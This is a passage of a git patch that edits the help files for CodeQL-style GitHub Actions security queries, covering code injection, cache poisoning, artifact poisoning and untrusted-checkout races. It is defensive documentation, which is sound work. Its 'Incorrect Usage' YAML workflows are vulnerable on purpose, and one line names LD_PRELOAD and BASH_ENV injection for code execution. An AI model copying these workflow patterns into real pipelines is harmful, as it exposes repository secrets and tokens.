@@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References From e83841bba9a3be69d0c14aa4f6e9fb59ad65dae6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Mon, 12 Aug 2024 09:29:26 +0000 Subject: [PATCH 0477/1267] fixes --- .../CWE-088/ArgumentInjectionCritical.md | 2 +- .../CWE-088/ArgumentInjectionMedium.md | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 4 +- .../Security/CWE-094/CodeInjectionMedium.md | 4 +- .../CWE-275/MissingActionsPermissions.md | 5 +- .../Security/CWE-285/ImproperAccessControl.md | 11 +-- .../CWE-349/CachePoisoningViaCodeInjection.md | 20 +++--- .../CWE-349/CachePoisoningViaDirectCache.md | 53 ++++++++++---- .../CachePoisoningViaPoisonableStep.md | 22 +++--- .../UntrustedCheckoutTOCTOUCritical.md | 72 +------------------ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 72 +------------------ .../CWE-571/ExpressionIsAlwaysTrue.md | 58 +++++++-------- .../CWE-829/ArtifactPoisoningCritical.md | 6 +- .../CWE-829/ArtifactPoisoningMedium.md | 6 +- .../CWE-829/UntrustedCheckoutCritical.md | 6 +- .../Security/CWE-829/UntrustedCheckoutHigh.md | 6 +- .../CWE-829/UntrustedCheckoutMedium.md | 6 +- 17 files changed, 126 insertions(+), 229 deletions(-) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md index 00dc3bad472..4957297be92 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md 
@@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md index 00dc3bad472..4957297be92 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md index cc85f68fb0d..f2e49446811 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md 
@@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations @@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index cc85f68fb0d..f2e49446811 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations 
@@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 31ddab5329d..9385759dae9 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md 
@@ -2,12 +2,11 @@ ## Description -A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. +If a GitHub Actions job or workflow has no explicit permissions set, then the repository permissions are used. Repositories created under organizations inherit the organization permissions. The organizations or repositories created before February 2023 have the default permissions set to read-write. Often these permissions do not adhere to the principle of least privilege and can be reduced to read-only, leaving the `write` permission only to a specific types as `issues: write` or `pull-requests: write`. ## Recommendations -Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: +Add the `permissions` key to the job or the root of workflow (in this case it is applied to all jobs in the workflow that do not have their own `permissions` key) and assign the least privileges required to complete the task: ```yaml name: "My workflow" diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md index c517ff98e58..594f381d8ce 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.md +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md 
@@ -2,17 +2,20 @@ ## Description -An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed. +Sometimes labels are used to approve GitHub Actions. An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed and approved by label. ## Recommendations -When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set. +When using labels, make sure that the code cannot be modified after it has been reviewed and the label has been set. ## Examples ### Incorrect Usage -The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. There are two problems with the code: + +1. The workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. The workflow will be triggered every time a new change is added to the Pull Request. +2. The workflow uses `ref: ${{ github.event.pull_request.head.ref }}` for checkout, which is a branch name of the Pull Request. There is a window of opportunity for the attacker to modify their branch after the Pull Request is labeled, but before the workflow starts and runs the checkout. ```yaml on: 
@@ -33,7 +36,7 @@ jobs: ### Correct Usage -Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. +Make sure that the workflow only gets triggered when the label is set and use an immutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. ```yaml on: diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md index fb927f97c68..667c41dc153 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. 
@@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md index c3c5970c37f..c12fb799892 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md 
@@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. 
@@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -69,13 +69,12 @@ jobs: ### Correct Usage -The following workflow is not checking out untrusted files and, therefore, is caching trusted files only. +The following workflow checking out untrusted files, but the cache is scoped to the Pull Request. ```yaml name: Secure Workflow on: - issue_comment: - types: [created] + pull_request: jobs: pr-comment: 
@@ -94,6 +93,34 @@ jobs: restore-keys: ${{ runner.os }}-pip- ``` +Note, that the example above doesn't allow using secrets if the Pull Request originates from a fork. In case secrets are needed, `pull_request_target` with labels as `safe to test` can be used, but the code in Pull Request must be manually reviewed before applying the label. + +```yaml +name: Secure Workflow +on: + pull_request_target: + types: [labeled] + +jobs: + pr-comment: + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha}} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + ## References - [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md index 70df52dc463..c777e198039 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md 
@@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. 
@@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -59,7 +59,7 @@ jobs: ### Correct Usage -The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch. +The following workflow runs untrusted code in a non-privileged job and the cache is scoped to the Pull Request branch. ```yaml name: Secure Workflow diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md index 105fe6ecd69..4e9b389834e 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description 
@@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. 
- -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: 
@@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md index 105fe6ecd69..4e9b389834e 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description 
@@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. 
- -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: 
@@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md index be1b566083a..1e7ea120cba 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md @@ -10,7 +10,7 @@ When an `if` condition erroneously evaluates to `true`, unintended steps may be To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: -1. Do not use Workflow Expressions in `if` conditions. +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. 2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. 3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. 
@@ -18,45 +18,45 @@ To avoid the vulnerability where an `if` condition always evaluates to `true`, i ### Correct Usage -1. Do not use Workflow Expressions: +1. Omit `${{` and `}}` in `if` conditions: -```yaml -if: steps.checks.outputs.safe_to_run == true -if: |- - steps.checks.outputs.safe_to_run == true -if: | - steps.checks.outputs.safe_to_run == true -``` + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` -2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: -```yaml -if: ${{ steps.checks.outputs.safe_to_run == true }} -if: |- - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ### Incorrect Usage 1. Do not mix Workflow Expressions with un-delimited expressions: -```yaml -if: ${{ steps.checks.outputs.safe_to_run }} == true -``` + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` 2. Do not include trailing new lines or spaces: -```yaml -if: | - ${{ steps.checks.outputs.safe_to_run == true }} -if: > - ${{ steps.checks.outputs.safe_to_run == true }} -if: " ${{ steps.checks.outputs.safe_to_run == true }}" -if: |+ - ${{ steps.checks.outputs.safe_to_run == true }} -if: >+ - ${{ steps.checks.outputs.safe_to_run == true }} -``` + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` ## References 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md index 2d7afb6b66e..9b1782d6ba8 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations @@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow 
@@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md index 2d7afb6b66e..9b1782d6ba8 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md +++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md @@ -2,7 +2,7 @@ ## Description -The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. +The workflow downloads artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job. ## Recommendations 
@@ -14,7 +14,7 @@ The workflow download artifacts that may be poisoned by an attacker in previousl ### Incorrect Usage -The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. +The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs a script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files, an attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed. ```yaml name: Insecure Workflow @@ -40,7 +40,7 @@ jobs: ### Correct Usage -The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`. +The following example, correctly creates a temporary directory and extracts the contents of the artifact there before calling `cmd.sh`. ```yaml name: Insecure Workflow diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md index c391e1255ed..71ba2032a9d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md @@ -1,4 +1,4 @@ -# Execution of Untrusted Checkedout Code +# Execution of Untrusted Checked-out Code ## Description 
@@ -10,9 +10,9 @@ GitHub workflows can be triggered through various repository events, including i - Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations. - Use labels like `safe to test` to vet PRs and manage the execution context appropriately. -The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). +The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second privileged workflow with the access to repository secrets, triggered by the completion of the first workflow using `workflow_run` trigger event, downloads the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens). -The artifacts downloaded from the first workflow should be considered untrusted and verified. +The artifacts downloaded from the first workflow should be considered untrusted and must be verified. ## Examples diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md index c391e1255ed..71ba2032a9d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md 
